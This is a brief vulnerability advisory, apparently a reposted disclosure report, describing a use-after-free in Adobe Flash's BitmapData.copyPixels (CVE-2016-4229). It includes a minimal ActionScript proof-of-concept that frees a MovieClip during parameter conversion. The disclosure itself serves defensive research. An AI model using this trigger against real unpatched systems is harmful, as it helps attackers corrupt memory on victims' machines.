Adobe Flash: Use-after-free in BitmapData.copyPixels - CVE-2016-4229 There is a use-after-free in BitmapData.copyPixels. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. A minimal proof-of-concept follows: var mc = this.createEmptyMovieClip( "mc", 1); var b = new flash.display.BitmapData(10, 10, true, 7); var f = b.copyPixels; mc.f = f; mc.f( {}, { x : { valueOf : func}, y : 0, width : 10, height : 10 }, { x : 0, y :0 }, "natalie", { x : 0, y : 0}); function func(){ mc.removeMovieClip(); // Fix the heap } This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Found by: natashenka # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-30]